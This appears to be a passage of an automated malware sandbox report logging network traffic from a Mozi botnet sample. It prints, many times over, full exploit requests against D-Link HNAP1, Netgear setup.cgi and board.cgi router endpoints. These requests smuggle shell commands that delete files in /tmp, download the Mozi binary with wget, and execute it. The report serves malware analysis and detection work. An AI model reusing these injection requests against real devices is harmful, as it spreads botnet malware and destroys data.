                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 51.178.69.101:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 38.87.83.34:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.218.148.138:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: /tmp/Mozi.m (PID: 4603)Socket: 0.0.0.0::56870
                Source: unknownTCP traffic detected without corresponding DNS query: 174.143.64.178
                Source: unknownTCP traffic detected without corresponding DNS query: 162.234.162.7
                Source: unknownTCP traffic detected without corresponding DNS query: 49.44.95.153
                Source: unknownTCP traffic detected without corresponding DNS query: 155.152.8.152
                Source: unknownTCP traffic detected without corresponding DNS query: 214.112.173.213
